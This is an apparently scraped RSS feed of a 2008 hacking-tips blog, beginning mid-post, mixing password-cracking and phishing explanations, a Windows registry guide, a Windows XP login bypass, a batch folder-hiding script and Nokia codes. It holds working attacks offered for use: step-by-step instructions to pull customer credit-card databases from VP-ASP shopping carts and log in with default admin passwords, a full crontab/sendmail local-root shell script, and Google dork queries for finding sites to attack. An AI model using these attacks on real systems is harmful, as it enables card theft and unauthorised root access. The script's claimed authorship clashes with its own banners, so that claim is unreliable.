/&gt;              * a simple modification of one of the preceding, such as suffixing                a digit or reversing the order of the letters.&lt;br /&gt;              and so on....&lt;/span&gt;&lt;/p&gt; &lt;span style=&quot;font-family:georgia;&quot;&gt;            &lt;/span&gt;&lt;p&gt;&lt;span style=&quot;font-family:georgia;&quot;&gt;In one survery of MySpace passwords which had been phished, 3.8                percent of passwords were a single word found in a dictionary, and                another 12 percent were a word plus a final digit; two-thirds of                the time that digit was.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;i&gt;***A password containing both uppercase &amp;amp;                      lowercase characters, numbers and special characters                    too; &lt;span style=&quot;font-family:georgia;&quot;&gt;is a strong password and can never                    be guessed.&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family:georgia;&quot;&gt;&lt;span style=&quot;font-size:130%;color:#0033ff;&quot;&gt;3) Default Passwords                :-&lt;/span&gt; A moderately high number of local                and online applications have inbuilt default passwords that have                been configured by programmers during development stages of software.                There are lots of applications running on the internet on which                default passwords are enabled. So, it is quite easy for an attacker                to enter default password and gain access to sensitive information.                A list containing default passwords of some of the most popular                applications is available on the internet.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family:georgia;&quot;&gt;&lt;span style=&quot;font-size:130%;color:#0033ff;&quot;&gt;4) Brute Force :-&lt;/span&gt;               If all other techniques failed, then attackers uses brute force                password cracking technique. Here an automatic tool is used which                tries all possible combinations of available keys on the keyboard.                As soon as correct password is reached it displays on the screen.This                techniques takes extremely long time to complete, but password will                surely cracked.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family:georgia;&quot;&gt;***&lt;/span&gt;&lt;span style=&quot;font-family:georgia;&quot;&gt;&lt;i&gt;Long is the password, large                    is the time taken to brute force it.&lt;/i&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family:georgia;&quot;&gt;&lt;span style=&quot;font-size:130%;color:#0033ff;&quot;&gt;5) Phishing :-&lt;/span&gt;                This is the most effective and easily executable password cracking                technique which is generally used to crack the passwords of e-mail                accounts, and all those accounts where secret information or sensitive                personal information is stored by user such as social networking                websites, matrimonial websites, etc.&lt;br /&gt;        Phishing is a technique in which the attacker creates the fake login screen          and send it to the victim, hoping that the victim gets fooled into entering          the account username and password. As soon as victim click on &quot;enter&quot;          or &quot;login&quot; login button this information reaches to the attacker          using scripts or online form processors while the user(victim) is redirected          to home page of e-mail service provider.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family:georgia;&quot;&gt;&lt;i&gt;***Never give reply to the                    messages which are demanding for your username-password,                   urging to be e-mail service provider.&lt;/i&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family:georgia;&quot;&gt;             It is possible to try to obtain the passwords              through other different methods, such as social engineering, wiretapping,              keystroke logging, login spoofing, dumpster diving, phishing, shoulder              surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse              or virus, identity management system attacks (such as abuse of Self-service              password reset) and compromising host security.&lt;br /&gt;            However, cracking usually designates a guessing attack.&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family:georgia;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family:georgia;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;</description><link>http://kwtb.blogspot.com/2008/07/password-hacking-methods-often-used.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-7096314859628754396</guid><pubDate>Thu, 03 Jul 2008 14:44:00 +0000</pubDate><atom:updated>2008-07-03T20:18:23.939+05:30</atom:updated><title>Registry guide for amatuers..</title><description>The Registry is a database used to store settings and options for the 32 bit versions of M*cro$oft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to a Control Panel settings, or File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry.&lt;br /&gt;&lt;br /&gt;The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 &amp;amp; 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained seperately in the %SystemRoot%\System32\Config directory. You can not edit these files directly, you must use a tool commonly known as a &quot;Registry Editor&quot;&lt;br /&gt;&lt;br /&gt;The Structure of The Registry :&lt;br /&gt;&lt;br /&gt;The Registry has a hierarchal structure, although it looks complicated the structure is similar to the directory structure on your hard disk, with Regedit being similar to Windows Explorer.&lt;br /&gt;&lt;br /&gt;Each main branch (denoted by a folder icon in the Registry Editor, see left) is called a Hive, and Hives contains Keys. Each key can contain other keys (sometimes referred to as sub-keys), as well as Values. The values contain the actual information stored in the Registry. There are three types of values; String, Binary, and DWORD - the use of these depends upon the context.&lt;br /&gt;&lt;br /&gt;There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows:&lt;br /&gt;* HKEY_CLASSES_ROOT - This branch contains all of your file association mappings to support the drag-and-drop feature, OLE information, Windows shortcuts, and core aspects of the Windows user interface.&lt;br /&gt;* HKEY_CURRENT_USER - This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the PC and contains information such as logon names, desktop settings, and Start menu settings.&lt;br /&gt;* HKEY_LOCAL_MACHINE - This branch contains computer specific information about the type of hardware, software, and other preferences on a given PC, this information is used for all users who log onto this computer.&lt;br /&gt;* HKEY_USERS - This branch contains individual preferences for each user of the computer, each user is represented by a SID sub-key located under the main branch.&lt;br /&gt;* HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current hardware configuration.&lt;br /&gt;* HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use with the Plug-&amp;amp;-Play features of Windows, this section is dymanic and will change as devices are added and removed from the system.&lt;br /&gt;&lt;br /&gt;Each registry value is stored as one of five main data types:&lt;br /&gt;&lt;br /&gt;* REG_BINARY - This type stores the value as raw binary data. Most hardware component information is stored as binary data, and can be displayed in an editor in hexadecimal format.&lt;br /&gt;* REG_DWORD - This type represents the data by a four byte number and is commonly used for boolean values, such as &quot;0&quot; is disabled and &quot;1&quot; is enabled. Additionally many parameters for device driver and services are this type, and can be displayed in REGEDT32 in binary, hexadecimal and decimal format, or in REGEDIT in hexadecimal and decimal format.&lt;br /&gt;* REG_EXPAND_SZ - This type is an expandable data string that is string containing a variable to be replaced when called by an application. For example, for the following value, the string &quot;%SystemRoot%&quot; will replaced by the actual location of the directory containing the Windows NT system files. (This type is only available using an advanced registry editor such as REGEDT32)&lt;br /&gt;* REG_MULTI_SZ - This type is a multiple string used to represent values that contain lists or multiple values, each entry is separated by a NULL character. (This type is only available using an advanced registry editor such as REGEDT32)&lt;br /&gt;* REG_SZ - This type is a standard string, used to represent human readable text values.&lt;br /&gt;&lt;br /&gt;Editing The Registry :&lt;br /&gt;&lt;br /&gt;The Registry Editor (REGEDIT.EXE) is included with most version of Windows (although you won&#39;t find it on the Start Menu) it enables you to view, search and edit the data within the Registry. There are several methods for starting the Registry Editor, the simplest is to click on the Start button, then select Run, and in the Open box type &quot;regedit&quot;, and if the Registry Editor is installed it should now open and look like the image below.&lt;br /&gt;&lt;br /&gt;Once you have started the Regedit you will notice that on the left side there is a tree with folders, and on the right the contents (values) of the currently selected folder.&lt;br /&gt;&lt;br /&gt;Like Windows explorer, to expand a certain branch (see the structure of the registry section), click on the plus sign.&lt;br /&gt;&lt;br /&gt;* to the left of any folder, or just double-click on the folder. To display the contents of a key (folder), just click the desired key, and look at the values listed on the right side. You can add a new key or value by selecting New from the Edit menu, or by right-clicking your mouse. And you can rename any value and almost any key with the same method used to rename files; right-click on an object and click rename, or click on it twice (slowly), or just press F2 on the keyboard. Lastly, you can delete a key or value by clicking on it, and pressing Delete on the keyboard, or by right-clicking on it, and choosing Delete.&lt;br /&gt;&lt;br /&gt;Note: it is always a good idea to backup your registry before making any changes to it. It can be intimidating to a new user, and there is always the possibility of changing or deleting a critical setting causing you to have to reinstall the whole operating system. It&#39;s much better to be safe than sorry!&lt;br /&gt;&lt;br /&gt;A great feature of the Registry Editor is it&#39;s ability to import and export registry settings to a text file, this text file, identified by the .REG extension, can then be saved or shared with other people to easily modify local registry settings. You can see the layout of these text files by simply exporting a key to a file and opening it in Notepad, to do this using the Registry Editor select a key, then from the &quot;Registry&quot; menu choose &quot;Export Registry File...&quot;, choose a filename and save. If you open this file in notepad you will see a file similar to the example below:&lt;br /&gt;REGEDIT4&lt;br /&gt;&lt;br /&gt;[HKEY_LOCAL_MACHINE\SYSTEM\Setup]&lt;br /&gt;&quot;SetupType&quot;=dword:00000000&lt;br /&gt;&quot;CmdLine&quot;=&quot;setup -newsetup&quot;&lt;br /&gt;&quot;SystemPrefix&quot;=hex:c5,0b,00,00,00,40,36,&lt;div class=&quot;para&quot;&gt;&lt;wbr&gt;02&lt;br /&gt;&lt;br /&gt;The layout is quite simple, REGEDIT4 indicated the file type and version, [HKEY_LOCAL_MACHINE\SYSTEM\Setup] indicated the key the values are from, &quot;SetupType&quot;=dword:00000000 are the values themselves the portion after the &quot;=&quot; will vary depending on the type of value they are; DWORD, String or Binary.&lt;br /&gt;&lt;br /&gt;So by simply editing this file to make the changes you want, it can then be easily distributed and all that need to be done is to double-click, or choose &quot;Import&quot; from the Registry menu, for the settings to be added to the system Registry.&lt;br /&gt;&lt;br /&gt;It is also possible to delete keys and values using REG files. To delete a key start by using the same format as the the REG file above, but place a &quot;-&quot; symbol in front of the key name you want to delete. For example to delete the [HKEY_LOCAL_MACHINE\SYSTEM\Setup] key the reg file would look like this:&lt;br /&gt;REGEDIT4&lt;br /&gt;&lt;br /&gt;[-HKEY_LOCAL_MACHINE\SYSTEM\Setup]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The format used to delete individual values is similar, but instead of a minus sign in front of the whole key, place it after the equal sign of the value. For example, to delete the value &quot;SetupType&quot; the file would look like:&lt;br /&gt;&lt;br /&gt;REGEDIT4&lt;br /&gt;&lt;br /&gt;[HKEY_LOCAL_MACHINE\SYSTEM\Setup]&lt;br /&gt;&quot;SetupType&quot;=-&lt;br /&gt;&lt;br /&gt;Use this feature with care, as deleting the wrong key or value could cause major problems within the registry, so remember to always make a backup first.&lt;br /&gt;&lt;br /&gt;Regedit has a number of command line options to help automate it&#39;s use in either batch files or from the command prompt. Listed below are some of the options, please note the some of the functions are operating system specific.&lt;br /&gt;&lt;br /&gt;* regedit.exe [options] [filename] [regpath]&lt;br /&gt;* [filename] Import .reg file into the registry&lt;br /&gt;* /s [filename] Silent import, i.e. hide confirmation box when importing files&lt;br /&gt;* /e [filename] [regpath] Export the registry to [filename] starting at [regpath] e.g. regedit /e file.reg HKEY_USERS\.DEFAULT&lt;br /&gt;* /L:system Specify the location of the system.dat to use&lt;br /&gt;* /R:user Specify the location of the user.dat to use&lt;br /&gt;* /C [filename] Compress (Windows 98)&lt;br /&gt;* /D [regpath] Delete the specified key (Windows 98)&lt;br /&gt;&lt;/div&gt;</description><link>http://kwtb.blogspot.com/2008/07/registry-guide-for-amatuers.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-2470948647611871257</guid><pubDate>Thu, 03 Jul 2008 14:39:00 +0000</pubDate><atom:updated>2008-07-03T20:12:37.212+05:30</atom:updated><title>Hacking Windows-XP adnmin password....</title><description>Can&#39;t Log On to Windows XP?&lt;br /&gt;&lt;br /&gt;# Place your Windows XP CD in your cd-rom and start your computer (it&#39;s assumed here that your XP CD is bootable as it should be - and that you have your bios set to boot from CD)&lt;br /&gt;# Keep your eye on the screen messages for booting to your cd Typically, it will be &quot;Press any key to boot from cd&quot;&lt;br /&gt;# Once you get in, the first screen will indicate that Setup is inspecting your system and loading files.&lt;br /&gt;# When you get to the Welcome to Setup screen, press ENTER to Setup Windows now&lt;br /&gt;# The Licensing Agreement comes next - Press F8 to accept it.&lt;br /&gt;# The next screen is the Setup screen which gives you the option to do a Repair.&lt;br /&gt;It should read something like &quot;If one of the following Windows XP installations is damaged, Setup can try to repair it&quot;&lt;br /&gt;Use the up and down arrow keys to select your XP installation (if you only have one, it should already be selected) and press R to begin the Repair process.&lt;br /&gt;&lt;br /&gt;# Let the Repair run. Setup will now check your disks and then start copying files which can take several minutes.&lt;br /&gt;# Shortly after the Copying Files stage, you will be required to reboot. (this will happen automatically and you will see a progress bar stating &quot;Your computer will reboot in 15 seconds&quot;&lt;br /&gt;# During the reboot, do not make the mistake of &quot;pressing any key&quot; to boot from the CD again! Setup will resume automatically with the standard billboard screens and you will notice Installing Windows is highlighted.&lt;br /&gt;# Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.&lt;br /&gt;# At the prompt, type NUSRMGR.CPL and press Enter. Voila! You have just gained graphical access to your User Accounts in the Control Panel.&lt;br /&gt;# Now simply pick the account you need to change and remove or change your password as you prefer. If you want to log on without having to enter your new password, you can type control userpasswords2 at the prompt and choose to log on without being asked for password. After you&#39;ve made your changes close the windows, exit the command box and continue on with the Repair (have your Product key handy).&lt;br /&gt;# Once the Repair is done, you will be able to log on with your new password (or without a password if you chose not to use one or if you chose not to be asked for a password). Your programs and personalized settings should remain intact.</description><link>http://kwtb.blogspot.com/2008/07/hacking-windows-xp-adnmin-password.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-6936568750474278138</guid><pubDate>Mon, 30 Jun 2008 09:38:00 +0000</pubDate><atom:updated>2008-06-30T15:41:45.234+05:30</atom:updated><title>Sending Anonymous mails........</title><description>Now its very easy to send anonymous mails to anyone.&lt;br /&gt;Just click below and signup and start sending anonymous mails to anyone you hate...&lt;br /&gt;https://www.anonymousspeech.com</description><link>http://kwtb.blogspot.com/2008/06/sending-anonymous-mails.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-8667708072070654521</guid><pubDate>Wed, 02 Apr 2008 08:03:00 +0000</pubDate><atom:updated>2008-04-02T13:38:30.360+05:30</atom:updated><title>Folder lock without software........</title><description>--&gt; Open Notepad&lt;br /&gt;--&gt; copy the below code and save with name &#39;locker.bat&#39;&lt;br /&gt;--&gt;locker.bat&lt;br /&gt;****Please don&#39;t forget to change your password in the code****&lt;br /&gt;REPLACE &quot;TYPE UR PASSWORD HERE&quot; AND ENTER WHAT U WANT AS PASSWORD.&lt;br /&gt;Now double click on locker .batFirst time start, it will create folder with Locker automatically for u.After creation of the Locker folder, place the contents u want to lockinside the Locker Folder and run locker.bat again. The Locker folderdisappears from the window. To make the folder available again,double click the locker.bat and enter the password.And you get your folder back!&lt;br /&gt;&lt;br /&gt;cls&lt;br /&gt;@ECHO OFF&lt;br /&gt;title Folder Locker&lt;br /&gt;if EXIST &quot;Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}&quot;&lt;br /&gt; goto UNLOCK&lt;br /&gt;if NOT EXIST Locker&lt;br /&gt; goto MDLOCKER&lt;br /&gt;:CONFIRM&lt;br /&gt;echo Are you sure u want to Lock the folder(Y/N)&lt;br /&gt;set/p &quot;cho=&gt;&quot;&lt;br /&gt;if %cho%==Y goto LOCK&lt;br /&gt;if %cho%==y goto LOCK&lt;br /&gt;if %cho%==n goto END&lt;br /&gt;if %cho%==N goto END&lt;br /&gt;echo Invalid choice.goto CONFIRM&lt;br /&gt;:LOCK&lt;br /&gt;ren Locker &quot;Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}&quot;&lt;br /&gt;attrib +h +s &quot;Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}&quot;&lt;br /&gt;echo Folder locked&lt;br /&gt;goto End&lt;br /&gt;:UNLOCK&lt;br /&gt;echo Enter password to Unlock folderset/p &quot;pass=&gt;&quot;&lt;br /&gt;if NOT %pass%== TYPE UR PASSWORD HERE goto FAIL&lt;br /&gt;attrib -h -s &quot;Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}&quot;&lt;br /&gt;ren &quot;Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}&quot; Locker&lt;br /&gt;echo Folder Unlocked successfully&lt;br /&gt;goto End&lt;br /&gt;:FAIL&lt;br /&gt;echo Invalid passwordgoto end:MDLOCKERmd Lockerecho Locker created successfully&lt;br /&gt;goto End&lt;br /&gt;:End</description><link>http://kwtb.blogspot.com/2008/04/folder-lock-without-software.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-1652687509540763507</guid><pubDate>Mon, 03 Mar 2008 11:38:00 +0000</pubDate><atom:updated>2008-03-03T17:53:06.895+05:30</atom:updated><title>Hacking Shopping carts.......</title><description>This exploit is only for educational purpose and I meant no harm to anybody.Use at your own risk as it works........&lt;br /&gt;SHOPADMINS ARE OF DIFFERENT COMPANIES LIKE : VP-ASP , X CART .. ETC ETC. I M POSTING TUTORIAL FOR HACKING VP-ASP SHOP.&lt;br /&gt; hope youu seen on internet whenever u try to buy some thing on internet with cc they show u a well programmed form very secure, they are carts .. like vp-asp xcarts .. specific sites are not hacked but carts are hack.. below I am posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked and through their *mdb file you can get their clients &#39; credit card details &#39; and also login name and password of their admin area. and all other info of clients and comapny secrets.HERE WE GO ...&lt;br /&gt;First we must find a website which uses this VP -ASP tye cart.To do this simply go to google.com&lt;br /&gt;and search this string&lt;br /&gt;intitle: VP-ASP Shopping Cart 5.00&lt;br /&gt;You will find many websites with VP-ASP 5.00 cart software installed&lt;br /&gt;Now let&#39;s go to the exploit..&lt;br /&gt;The page&#39;s URL will be like this &gt; ****://***.victim.com/shop/shopdisplaycategories.asp&lt;br /&gt;In that area type  ****://***.victim.com/shop/diag_dbtest.asp  and press enter.&lt;br /&gt;You will find a database testing page with contents like&lt;br /&gt;xDatabase: shopping140&lt;br /&gt;xDblocation:resx                                   etc..&lt;br /&gt;For us important is that shopping140.Then in the url bar you have to enter&lt;br /&gt;****://***.victim.com/shop/resx/shopping140.mdb&lt;br /&gt;If you get an error message then you must enter&lt;br /&gt;****://***.victim.com/shop/shopping500.mdb&lt;br /&gt;You will download a file which has all info like credit card number or username and password etc.With this info go to address&lt;br /&gt;****://***.victim.com/shop/shopadmin.asp&lt;br /&gt;&lt;br /&gt;If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are&lt;br /&gt;Username: admin&lt;br /&gt;password: admin&lt;br /&gt;or&lt;br /&gt;Username: vpasp&lt;br /&gt;password: vpasp</description><link>http://kwtb.blogspot.com/2008/03/hacking-shopping-carts.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>47</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-6653397789503013825</guid><pubDate>Tue, 29 Jan 2008 10:41:00 +0000</pubDate><atom:updated>2008-01-29T16:37:48.988+05:30</atom:updated><title>Be a script kiddie!</title><description>&lt;strong&gt;&lt;em&gt;Unix Password Hacking...................&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;PERL CODE&lt;/strong&gt;&lt;br /&gt;#!/bin/sh&lt;br /&gt;# Vixie crontab exploit&lt;br /&gt;# Local user can gain root access&lt;br /&gt;#Tested redhat linux : 4.2, 5.0, 5.1, 6.0&lt;br /&gt;# Programmed by Karthik.P&lt;br /&gt;PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin&lt;br /&gt;export PATH&lt;br /&gt;echo&lt;br /&gt;echo &quot;PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus&quot;&lt;br /&gt;echo &quot;PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug&quot;&lt;br /&gt;echo&lt;br /&gt;echo make shell&lt;br /&gt;echo&lt;br /&gt;cat &gt; /tmp/sh.c &lt;&lt; EOF&lt;br /&gt;#include&lt;br /&gt;#include&lt;br /&gt;int main()&lt;br /&gt;{&lt;br /&gt;        setuid(0);&lt;br /&gt;        setgid(0);&lt;br /&gt;        execl(&quot;/bin/sh&quot;,&quot;sh&quot;,0);&lt;br /&gt;        return 0;&lt;br /&gt;}&lt;br /&gt;EOF&lt;br /&gt;echo compile shell&lt;br /&gt;echo&lt;br /&gt;cc -o /tmp/sh /tmp/sh.c  gcc -o /tmp/sh /tmp/sh.c&lt;br /&gt;echo make execute shell script&lt;br /&gt;echo&lt;br /&gt;cat &gt; /tmp/makesh &lt;&lt; EOF&lt;br /&gt;#!/bin/sh&lt;br /&gt;chown root /tmp/sh&lt;br /&gt;chgrp root /tmp/sh&lt;br /&gt;chmod 4755 /tmp/sh&lt;br /&gt;EOF&lt;br /&gt;chmod 755 /tmp/makesh&lt;br /&gt;echo hack sendmail.cf&lt;br /&gt;echo&lt;br /&gt;cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1&lt;br /&gt;sed &#39;s/O DefaultUser=8:12/O DefaultUser=0:0/g&#39; /tmp/sendmail.cf.tmp1 &gt; /tmp/sendmail.cf&lt;br /&gt;sed &#39;s/P=/usr/bin/procmail/P=/tmp/makesh/g&#39; /tmp/sendmail.cf.tmp1 &gt; /tmp/sendmail.cf.tmp2&lt;br /&gt;sed &#39;s/A=procmail/A=makesh/g&#39; /tmp/sendmail.cf.tmp2 &gt; /tmp/sendmail.cf.tmp3&lt;br /&gt;cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf&lt;br /&gt;rm -f /tmp/sendmail.cf.tmp1&lt;br /&gt;rm -f /tmp/sendmail.cf.tmp2&lt;br /&gt;rm -f /tmp/sendmail.cf.tmp3&lt;br /&gt;echo make cron file&lt;br /&gt;echo&lt;br /&gt;cat &gt; /tmp/cronfile &lt;&lt; EOF&lt;br /&gt;MAILTO=-C/tmp/sendmail.cf `whoami`&lt;br /&gt;* * * * * ls&lt;br /&gt;EOF&lt;br /&gt;echo input cron file&lt;br /&gt;echo&lt;br /&gt;crontab /tmp/cronfile&lt;br /&gt;echo wait for 1 minute&lt;br /&gt;echo&lt;br /&gt;sec=`date +%S`&lt;br /&gt;wait=`expr 65 - $sec`&lt;br /&gt;sleep $wait&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;echo execute shell&lt;br /&gt;echo&lt;br /&gt;/tmp/sh&lt;br /&gt;echo delete data files&lt;br /&gt;echo&lt;br /&gt;cd /tmp&lt;br /&gt;rm -f sendmail.cf cronfile makesh sh.c&lt;br /&gt;crontab /dev/null&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To make this work:Cut away what comes before &quot;#!/bin/sh&quot; and after &quot;crontab /dev/null&quot;, name it something like crontab_exploit.sh and do &quot;chmod a+x crontab_exploit.sh&quot;.&lt;br /&gt;then ./crontab_exploit.sh</description><link>http://kwtb.blogspot.com/2008/01/be-script-kiddie.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-8176646045611675093</guid><pubDate>Tue, 29 Jan 2008 10:36:00 +0000</pubDate><atom:updated>2008-01-29T16:11:15.850+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">hack</category><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>GOOGLE HACKING THROUGH &quot;inurl&quot;:</title><description>“inurl” is used to search within a site’s URL itself. This is very useful if you are familiar with a URL string or with standard URL strings used by different content management systems.&lt;br /&gt;There are a host of other keywords in directory listings that you can use to explore web servers. Of course, we don’t recommend using these for malicious intent. Everything is for acemic purposes only, okay? Also, if you’re a webmaster, it helps to know if your own servers are not vulnerable to these “Google attacks.” You can even play the good samaritan by contacting owners of hosting accounts that blatantly put out their directory listings and thus endanger their host’s security.&lt;br /&gt;&lt;br /&gt;Of course, it goes without saying that directory listings that aren’t at the root folder cannot be crawled by Google unless they are linked to directly on any other open website that Google can crawl. This means you can theoretically hide your directory from prying eyes even if it’s not locked out from viewing as long as you do not link to it from other sites. Also, it helps if you use long directory names that cannot be found in the dictionary.&lt;br /&gt;&lt;br /&gt;Some examples&lt;br /&gt;You can search for the words “admin” and “userlist” within the URL to come up with open directories that contain userlists.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;inurl:admin inurl:userlist&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;You can also search for websites that use WordPress as their CMSes (even sites that are non-blogs).&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;inurl:wp-admin&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;You can use this in conjunction with the site: operator to get sites in that domain or domainspace that use WordPress as CMS (and perhaps you can try to hack them using known WordPress vulnerabilities, if any).&lt;br /&gt;For example, this would give you a results page of all .US sites that use WordPress.&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;inurl:wp-admin +site:.us&lt;/strong&gt;</description><link>http://kwtb.blogspot.com/2008/01/google-hacking-through-inurl.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>12</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-4655802604051183169</guid><pubDate>Fri, 21 Dec 2007 16:54:00 +0000</pubDate><atom:updated>2007-12-21T22:28:24.521+05:30</atom:updated><title>XP genius</title><description>1- Private Character Editor&lt;br /&gt;This program is for designing icons and Characters(Alphapet)Click :startThen :Runtype :EUDCEDIT&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2- iExpress&lt;br /&gt;This Program is for conerting your files to EXCUTABLE files&lt;br /&gt;Click : startThen : runtype : iexpress&lt;br /&gt;&lt;br /&gt;3-Disk Cleanup&lt;br /&gt;This program used for cleaning harddisk to offer space&lt;br /&gt;Click : startThen : runtype : cleanmgr&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4-Dr Watson&lt;br /&gt;This program Is for repairing problems in Windows&lt;br /&gt;Click : startThen : runtype : drwtsn32</description><link>http://kwtb.blogspot.com/2007/12/xp-genius.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-6176970574052524054</guid><pubDate>Fri, 21 Dec 2007 16:47:00 +0000</pubDate><atom:updated>2007-12-21T22:23:51.706+05:30</atom:updated><title>Nokia Mobile Tricks</title><description>*#3370# Activate Enhanced Full Rate Codec(EFR)-Your phone uses the best sound quality but talk time is reduced by approx 5%&lt;br /&gt;*#3370# Deactivate Enhanced Full Rate Codec( EFR)&lt;br /&gt;*#4720# Activate Half Rate Codec - Your phone uses a lower quality soundbut you should gain approx 30% more Talk Time&lt;br /&gt;*#4720# Deactivate Half Rate Codec&lt;br /&gt;*#0000# Displays your phones software version,1st Line : SoftwareVersion,2nd Line : Software ReleaseDate,3rd Line : Compression Type&lt;br /&gt;*#9999# Phones software v ersion if&lt;br /&gt;*#0000# does not work&lt;br /&gt;*#06# For checking the International Mobile Equipment Identity (IMEI Number)5 #pw+1234567890+1# Provider Lock Status.(use the &quot;*&quot; button to obtain the &quot;p,w&quot; and &quot;+&quot; symbols)&lt;br /&gt;6 #pw+1234567890+2# Network Lock Status.(use the &quot;*&quot; button to obtain the &quot;p,w&quot; and &quot;+&quot; symbols)&lt;br /&gt;7 #pw+1234567890+3# Country Lock Status.(use the &quot;*&quot; button to obtain the &quot;p,w&quot; and &quot;+&quot; symbols)&lt;br /&gt;8 #pw+1234567890+4# SIM Card Lock Status.(use the &quot;*&quot; button to obtain the &quot;p,w&quot; and &quot;+&quot; symbols)&lt;br /&gt;9 *#147# (vodafone) this lets you know who called you last *#1471# Last call (Only vodofone)&lt;br /&gt;10 *#21# Allows you to check the number that &quot;All Calls&quot; are diverted To&lt;br /&gt;11 *#2640# Displays security code in use&lt;br /&gt;12 *#30# Lets you see the private number&lt;br /&gt;13 *#43# Allows you to check the &quot;Call Waiting&quot; status of your phone.&lt;br /&gt;14 *#61# Allows you to check the number that &quot;On No Reply&quot; calls are diverted to&lt;br /&gt;15 *#62# Allows you to check the number that &quot;Divert If Unrea chable(no service)&quot; calls are diverted to&lt;br /&gt;16 *#67# Allows you to check the number that &quot;On Busy Calls&quot; are diverted to&lt;br /&gt;17 *#67705646# Removes operator logo on 3310 &amp;amp; 3330&lt;br /&gt;18 *#73# Reset phone timers and game scores&lt;br /&gt;19 *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature&quot;SIM Clock Stop Allowed&quot;,it means you will get the best standby time possible&lt;br /&gt;20 *#7760# Manufactures code&lt;br /&gt;21 *#7780# Restorefa ctory settings&lt;br /&gt;22 *#8110# Software version for the nokia 8110&lt;br /&gt;23 *#92702689# (to rember *#WAR0ANTY#)Displays -1.Serial Number,2.Date Made3.Purchase Date,4.Date of lastrepair (0000 for no repairs),5.Transfer UserData.To exit this mode-you need to switch your phone off then on again&lt;br /&gt;24 *#94870345123456789# Deactivate the PWM-Mem&lt;br /&gt;25 **21*number# Turn on &quot;All Calls&quot; diverting to the phone number entered&lt;br /&gt;26 **61*number# Turn on &quot;No Reply&quot; diverting to the phone number entered&lt;br /&gt;27 **67*number# Turn on &quot;On Busy&quot; diverting to the phone number entered&lt;br /&gt;28 12345 This is the default security code press and hold # Lets you switch between 